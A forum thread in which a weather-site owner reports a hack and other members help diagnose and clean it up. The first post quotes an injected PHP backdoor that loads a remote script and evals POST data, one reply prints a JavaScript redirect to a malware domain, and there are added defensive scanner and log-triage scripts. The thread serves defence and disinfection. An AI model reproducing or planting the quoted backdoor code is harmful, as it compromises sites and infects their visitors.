
Author Topic: Re-direction Problem  (Read 395 times)


Offline tstorm

  • Posts: 359
  • Harpers Ferry, WV
  • OS/Browser:
  • Windows 7/Server 2008 R2
  • Firefox 8.0.1
    • Meadowbrook Farm Weather
Re-direction Problem
« on: December 31, 2011, 06:53:10 PM »
Today I noticed that if an invalid script is requested (i.e. http://www.harpersferry-weather.com/jfk.php) a user is directed to floatanswer[dot]ru/access/index.php . Before today, if there was an invalid script request a user was redirected towards a 404 image.   Help!

I'm thinking that someone hacked into the server for my files as I have noticed that a lot of files (wx file, index files) were changed this morning at exactly the same time.  On the 1st line the following was added after <?php :

global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; $sessdt_k = "lb11"; if(!@$_COOKIE[$sessdt_k]) { $sessdt_f = "102"; if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } } else { if($_COOKIE[$sessdt_k]=="102") { $sessdt_f = (rand(1000,9000)+1); if(!@headers_sent()) { @setcookie($sessdt_k,$sessdt_f); } else { echo "<script>document.cookie='".$sessdt_k."=".$sessdt_f."';</script>"; } $sessdt_j = @$_SERVER["HTTP_HOST"].@$_SERVER["REQUEST_URI"]; $sessdt_v = urlencode(strrev($sessdt_j)); $sessdt_u = "http://turnitupnow.net/?rnd=".$sessdt_f.substr($sessdt_v,-200); echo "<script src='$sessdt_u'></script>"; echo "<meta http-equiv='refresh' content='0;url=http://$sessdt_j'><!--"; } } $sessdt_p = "showimg"; if(isset($_POST[$sessdt_p])){eval(base64_decode(str_replace(chr(32),chr(43),$_POST[$sessdt_p])));exit;} }


Thanks,

John

.ru link disabled - Niko
« Last Edit: December 31, 2011, 08:40:36 PM by niko »

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Windows XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #1 on: December 31, 2011, 08:26:51 PM »
Oooh... nasty issue.  Some external entity has likely written an entry in your .htaccess file causing the redirect, and any time you get a redirect to a .ru (Russia) URL, it's likely to be a source of malware.  Using NoScript to block the execution of the redirect (but enable viewing of the contents), the page it goes to contains
Code:
<html>
<head>
<script LANGUAGE="JavaScript" type="text/javascript">

function readCookie(name) {
var xname = name + "="
var xlen = xname.length
var clen = document.cookie.length
var i = 0
while(i < clen){
       var j = i + xlen
       if (document.cookie.substring(i, j) == xname)
return getCookieVal(j)
       i = document.cookie.indexOf(" ",1) + 1
       if (i == 0)  break
}
return null
}

function getCookieVal(n){
var endstr = document.cookie.indexOf(";", n)
if (endstr == -1)
endstr = document.cookie.length
return unescape(document.cookie.substring(n, endstr))
}

function writeCookie(name, value, expires, path, domain, secure) {
document.cookie =
name +"=" + escape(value) +
((expires) ? "; expires="  + expires.toGMTString() : "") +
((path) ? "; path=" + path : "") +
((domain) ? "; domain=" + domain : "") +
((secure) ? "; secure" : "")
}

writeCookie('d4c734f0a93e4f8dd06e5b2746','d5317e373e86ae1ab4ce9c22726');
if ( readCookie('d4c734f0a93e4f8dd06e5b2746') == 'd5317e373e86ae1ab4ce9c22726')
document.location.href='http://footerleftonmouseover.ru/main.php?page=b67137fa79c9e463';
else
document.location.href='http://www.bing.com/search?q=404+error&form=MSNH14&qs=n&sk=&qs=AS&sk=&pq=404+error&sp=1&sc=8-9';
</script>
</head>
</html>
which appears to be a front-end for a drive-by malware JavaScript downloader which will automatically activate if JavaScript is allowed on that site.  Bad news for any unprotected browsers.

Check your .htaccess file now, and if nothing appears in there to redirect 404s to the floatanswer.ru domain, then contact your webhoster and say there's likely a webserver compromise and have them check the master Apache config files.
« Last Edit: December 31, 2011, 08:32:54 PM by saratogaWX »
Ken True
Saratoga Weather
CWOP: CW1792
WeatherUnderground: KCASARAT1
Free weather website PHP scripts and WD website AJAX templates

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Windows XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #2 on: December 31, 2011, 08:34:29 PM »
John..  send me a direct email (webmaster at saratoga-weather.org) and I'll send you a PHP script that can be used to detect a malware infection on your site.

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Windows XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #3 on: December 31, 2011, 08:37:56 PM »
And yes, the added PHP lines you added to the first post are a dead giveaway that someone has hacked the site (and maybe not just your site on a shared webserver).  Time to do a cleanup and make sure the tech support for your webserver is aware of the issue so they can check the logs to see who got in and via what means.
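Added example (not the detection script Ken offers above and not code from anyone in this thread): a small Python scanner that does the two checks the replies above ask for on a local copy of the web root. It flags PHP files carrying the markers of the prelude John quoted in the first post (the $sessdt_ variables, the eval(base64_decode(...)) POST handler, the chr(32)/chr(43) repair of the payload) and .htaccess lines whose ErrorDocument/Redirect/RewriteRule target is a host that is not your own. The file names, hostnames and fixture contents in demo() are constructed for the example.

```python
"""Added example, not Ken True's script and not code from this thread: scan a
local copy of a site's web root for the injected prelude quoted in the first
post and for .htaccess rules that hand error pages or redirects to an outside
host. Everything in demo() is a constructed fixture."""
import re
import tempfile
from pathlib import Path
from typing import Dict, List, Set
from urllib.parse import urlparse

# Signatures taken from the injected prelude in the first post. They are
# deliberately narrow; other droppers use other names, so extend this table.
INJECTION_MARKERS = {
    "sessdt_prefix": re.compile(r"\$sessdt_[a-z]\b"),
    "eval_base64_post": re.compile(r"eval\s*\(\s*base64_decode\s*\("),
    "space_to_plus_repair": re.compile(r"str_replace\s*\(\s*chr\(32\)\s*,\s*chr\(43\)"),
    "meta_refresh_echo": re.compile(r"http-equiv=['\"]refresh['\"]"),
}

# Apache directives in .htaccess that can send a visitor (or a 404) elsewhere.
HTACCESS_TARGET = re.compile(
    r"^\s*(?P<directive>ErrorDocument|Redirect(?:Match|Permanent|Temp)?|RewriteRule)\s+"
    r".*?(?P<url>https?://\S+)",
    re.IGNORECASE,
)


def scan_php_source(source: str) -> List[str]:
    """Return the names of the injection markers present in one PHP file."""
    return [name for name, rx in INJECTION_MARKERS.items() if rx.search(source)]


def scan_htaccess(source: str, own_hosts: Set[str]) -> List[str]:
    """Return .htaccess lines whose target URL points at a host not in own_hosts."""
    flagged = []
    for line in source.splitlines():
        m = HTACCESS_TARGET.match(line)
        if m and (urlparse(m.group("url")).hostname or "") not in own_hosts:
            flagged.append(line.strip())
    return flagged


def scan_tree(root: Path, own_hosts: Set[str]) -> Dict[str, List[str]]:
    """Walk root and map each suspicious relative path to what was found in it."""
    findings: Dict[str, List[str]] = {}
    for path in sorted(root.rglob("*")):
        if not path.is_file():
            continue
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        if path.name == ".htaccess":
            hits = scan_htaccess(text, own_hosts)
        elif path.suffix.lower() in {".php", ".phtml", ".inc"}:
            hits = scan_php_source(text)
        else:
            continue
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings


def demo() -> Dict[str, List[str]]:
    """Build a constructed three-file web root in a temp dir and scan it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "wx").mkdir()
        # Clean script: nothing to report.
        (root / "wx" / "clean.php").write_text("<?php\necho 'temperature: 41F';\n")
        # Constructed infected script: carries the markers only, $p is undefined.
        (root / "index.php").write_text(
            "<?php global $sessdt_o; if(!$sessdt_o) { $sessdt_o = 1; "
            "eval(base64_decode(str_replace(chr(32),chr(43),$p))); }\n"
            "echo 'home';\n"
        )
        # Constructed .htaccess: a local 404 page is fine, the external one is not.
        (root / ".htaccess").write_text(
            "ErrorDocument 403 /403.html\n"
            "ErrorDocument 404 http://malware.example.org/access/index.php\n"
        )
        return scan_tree(root, {"www.example.com", "example.com"})


if __name__ == "__main__":
    for rel, hits in demo().items():
        print(f"{rel}: {', '.join(hits)}")
```

Run it against a fresh download of the site rather than on the shared host itself, and treat a hit on any file as a reason to compare the whole tree against the last clean backup: the prelude in the first post was prepended to every PHP file at once, so one clean-looking file proves little.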

Offline niko

  • syzygy
  • Global Moderator
  • Posts: 21,998
  • Crystal Ball broken! Please post the URL.
  • Northern California, U.S.A.
  • OS/Browser:
  • Windows 7/Server 2008 R2
  • MS Internet Explorer 8.0
    • http://www.realweatherstation.com
Re: Re-direction Problem
« Reply #4 on: December 31, 2011, 08:41:41 PM »
John, I edited your post to disable the link. Best not to have folks clicking on that.

Offline MesquiteWx

  • Nick
  • Posts: 403
  • Mesquite Weather Network
  • Mesquite, Texas
  • OS/Browser:
  • Mac OS X 10.6
  • Firefox 3.6.24
    • Mesquite Weather Network
Re: Re-direction Problem
« Reply #5 on: January 01, 2012, 01:39:18 AM »
This isn't a server issue; this is the Google redirect malware attack that Firefox users are encountering.

I see you're on Server 08 R2; are you using domain profiles?

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Windows XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #6 on: January 01, 2012, 02:25:31 AM »
It was both a malicious modification of all his PHP files (to include the code snippet he showed above), and a general hack to have the 404-error processing HTML page do the script to refer to the malware drive-by site (code shown above).

John let me know his hoster has restored most (but not all) his files from a prior backup, and he's working to reconstruct his site.  Awful way to greet the new year.  No clues on how they 'got in' to do the mischief as of now.

Offline MesquiteWx

  • Nick
  • Posts: 403
  • Mesquite Weather Network
  • Mesquite, Texas
  • OS/Browser:
  • Mac OS X 10.6
  • Firefox 3.6.24
    • Mesquite Weather Network
Re: Re-direction Problem
« Reply #7 on: January 01, 2012, 04:36:28 AM »
That's all great, he is able to restore his files only for it to happen again because it is using ADUC as a backdoor to his web host while browsing as it attaches itself to the profile on his domain. You can restore your files all day long. But, you need to stop the source of the initial ejection or it will happen again. In order to do that you need to back up your profile then delete it and then log in and recreate it. But before you do that make sure you have an admin account with local access. Otherwise you won't be able to log in and recreate it.

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Windows XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #8 on: January 01, 2012, 06:39:00 AM »
Quote from: MesquiteWx on January 01, 2012, 04:36:28 AM
That's all great, he is able to restore his files only for it to happen again because it is using ADUC as a backdoor to his web host while browsing as it attaches itself to the profile on his domain. You can restore your files all day long. But, you need to stop the source of the initial ejection or it will happen again. In order to do that you need to back up your profile then delete it and then log in and recreate it. But before you do that make sure you have an admin account with local access. Otherwise you won't be able to log in and recreate it.
I'm curious about what leads you to assert that "it is using ADUC as a backdoor to his webhost".
The HTTP headers indicate an Apache webserver is used with no hint of OS.  I thought ADUC (Active Directory Users and Computers) was a Microsoft Windows thing, and it's quite possible his webserver is Linux (or variant).
Would you mind elaborating on your thinking that led you to the ADUC conclusion?

Best regards,
Ken

Offline MesquiteWx

  • Nick
  • Posts: 403
  • Mesquite Weather Network
  • Mesquite, Texas
  • OS/Browser:
  • Mac OS X 10.6
  • Firefox 3.6.24
    • Mesquite Weather Network
Re: Re-direction Problem
« Reply #9 on: January 01, 2012, 06:16:12 PM »
According to his details he uses Windows 7/Server 2008 R2 as the OS he currently uses that he is browsing on. Yes you're right it has no association to his web server. BUT, something had to infiltrate his web server, and normally it is through log in. Since he is on Server 08 RC2 I am assuming he is on a DC with a local domain, which means if that's the case he has a domain profile, not a local machine profile. The ntuser.dat file stores all the credentials and then some in the HKEY_CURRENT_USER hive for the registry. So initially if his machine was infected and when he logged into his web host he now just gave access to his web host as it stores those credentials in a host file from the infection. You can check the host file to see if it's been modified by clicking Start, clicking Run, typing %systemroot%\system32\drivers\etc and then looking for the host file. Luckily though if he does log into a domain then he can back up his profile then delete it, log in and it will recreate a new one. But he would need to be logged in as a local admin on the machine, not his profile, even though it may have local admin access. Then transfer everything back over except for your local settings and application settings.

I deal with this exact problem at least twice a week since Aug in one of my clients' environments, where when the agents log in to the domain it runs login scripts from their web server for their agent login, time clock, etc. for various tasks, which is set in their host file. Don't ask me why; I told them that was not very good since now it bypasses the security appliance.

Offline niko

  • syzygy
  • Global Moderator
  • Posts: 21,998
  • Crystal Ball broken! Please post the URL.
  • Northern California, U.S.A.
  • OS/Browser:
  • Windows 7/Server 2008 R2
  • MS Internet Explorer 9.0
    • http://www.realweatherstation.com
Re: Re-direction Problem
« Reply #10 on: January 01, 2012, 06:23:03 PM »
"Windows 7/Server 2008 R2" doesn't necessarily mean he's running server 08 RC2. The OS ID isn't that smart, see mine, I'm posting this from plain old W7/32.

Offline MesquiteWx

  • Nick
  • Posts: 403
  • Mesquite Weather Network
  • Mesquite, Texas
  • OS/Browser:
  • Mac OS X 10.6
  • Firefox 3.6.24
    • Mesquite Weather Network
Re: Re-direction Problem
« Reply #11 on: January 01, 2012, 06:30:55 PM »
You're right, that may be the case. That is why I asked earlier if that was the case, because if it is then he would need to get to the root of the infection and how his web host was infected. Luckily if he is on a local domain and his profile is infected it can be easily removed. If not, then you have quite the task ahead of you if his PC is infected.

Offline niko

  • syzygy
  • Global Moderator
  • Posts: 21,998
  • Crystal Ball broken! Please post the URL.
  • Northern California, U.S.A.
  • OS/Browser:
  • Windows 7/Server 2008 R2
  • MS Internet Explorer 9.0
    • http://www.realweatherstation.com
Re: Re-direction Problem
« Reply #12 on: January 01, 2012, 06:49:41 PM »
There's also a trojan that will grab the login from FileZilla if he uses that, and possible vulnerabilities in scripts from unknown sources, and, and, too many different possible vectors unfortunately :(

Offline saratogaWX

  • Posts: 4,577
  • Saratoga, CA, USA 37:16:28N, 122:01:23W - Elev: 374ft.
  • OS/Browser:
  • Win XP
  • Firefox 9.0.1
    • Saratoga Weather
Re: Re-direction Problem
« Reply #13 on: January 01, 2012, 07:34:08 PM »
I've been analyzing John's Apache logs, and it looks like the malicious activity was the result of a PHP shell script injected into his site and remotely operated via POST to his website.  Now looking back to see what was used to get the shell script there in the first place.  This is a similar avenue to what I've found with other sites I've helped debug/disinfect in the past .. a vulnerability in one script is used to download a powerful remote-shell PHP script which is then used to do the mischief on the site.  No ADUC or user credentials compromise needed .. only a vulnerable (read: poorly secured) script is needed as the starting point for this attack to succeed.  Moral:  keep the software on your site up-to-date, particularly any software that allows user uploads to your site (like photo galleries, in-place editors, etc.)

Best regards,
Ken
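Added example, not the analysis Ken ran on John's logs and not code from this thread: a first pass over an Apache combined-format access log that groups POST requests to PHP scripts which are not known form handlers. A backdoor like the prelude in the first post (it only acts on a POST field) is driven entirely by POST, usually from one address and with no Referer, so those groups are where to start reading. The log lines, IP addresses, hostname and allowlist below are constructed for the example.

```python
"""Added example, not from this thread: triage an Apache combined-format access
log for POST requests to PHP scripts outside a known-handler allowlist, the
traffic pattern of a POST-operated PHP shell. The sample log is constructed."""
import re
from datetime import datetime
from typing import Dict, List, Optional, Set

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Scripts on this constructed site that legitimately receive form POSTs.
ALLOWED_POST_PATHS = {"/contact.php"}

# Constructed log: ordinary visitors, one legitimate form post, then a client
# driving a script in /images/ and the (prepended) backdoor in index.php by POST.
SAMPLE_LOG = """\
203.0.113.5 - - [31/Dec/2011:09:01:12 -0500] "GET /index.php HTTP/1.1" 200 5123 "-" "Mozilla/5.0 (Windows NT 6.1) Firefox/8.0.1"
203.0.113.5 - - [31/Dec/2011:09:01:13 -0500] "GET /wxforecast.php?days=3 HTTP/1.1" 200 2210 "http://www.example.net/index.php" "Mozilla/5.0 (Windows NT 6.1) Firefox/8.0.1"
203.0.113.9 - - [31/Dec/2011:09:05:40 -0500] "POST /contact.php HTTP/1.1" 302 0 "http://www.example.net/contact.php" "Mozilla/5.0 (Macintosh) Firefox/3.6.24"
198.51.100.7 - - [31/Dec/2011:09:14:02 -0500] "POST /images/cache.php HTTP/1.1" 200 412 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [31/Dec/2011:09:14:05 -0500] "POST /images/cache.php HTTP/1.1" 200 88 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
198.51.100.7 - - [31/Dec/2011:09:14:31 -0500] "POST /index.php HTTP/1.1" 200 5123 "-" "Mozilla/4.0 (compatible; MSIE 6.0)"
this line is not in combined format and is skipped
"""


def parse_line(line: str) -> Optional[Dict[str, object]]:
    """Parse one combined-format line; return None for anything that does not fit."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec: Dict[str, object] = dict(m.groupdict())
    rec["path"] = m.group("target").split("?", 1)[0]  # drop the query string
    rec["time"] = datetime.strptime(m.group("time"), "%d/%b/%Y:%H:%M:%S %z")
    return rec


def find_suspect_posts(log_text: str, allowed: Set[str]) -> List[Dict[str, object]]:
    """Group POSTs to .php paths outside the allowlist by (client IP, path)."""
    groups: Dict[tuple, Dict[str, object]] = {}
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST":
            continue
        path = str(rec["path"])
        if not path.lower().endswith(".php") or path in allowed:
            continue
        g = groups.setdefault((rec["ip"], path), {
            "ip": rec["ip"], "path": path, "count": 0, "no_referer": 0,
            "statuses": set(), "first": rec["time"], "last": rec["time"],
        })
        g["count"] += 1
        g["no_referer"] += rec["referer"] in ("", "-")  # scripted clients send none
        g["statuses"].add(rec["status"])
        g["first"] = min(g["first"], rec["time"])
        g["last"] = max(g["last"], rec["time"])
    # Busiest (ip, path) pairs first: a shell being driven produces many POSTs.
    return sorted(groups.values(), key=lambda g: (-g["count"], g["ip"], g["path"]))


if __name__ == "__main__":
    for g in find_suspect_posts(SAMPLE_LOG, ALLOWED_POST_PATHS):
        print(f'{g["ip"]} POST {g["path"]} x{g["count"]} '
              f'(no referer: {g["no_referer"]}, status {sorted(g["statuses"])}, '
              f'{g["first"]:%H:%M:%S}-{g["last"]:%H:%M:%S})')
```

The allowlist is the part that needs local knowledge: list the scripts your site really receives forms on, and everything else that takes a POST is worth opening in an editor. The first request from the flagged address, just before the earliest POST, is usually the upload or exploit request Ken is looking for.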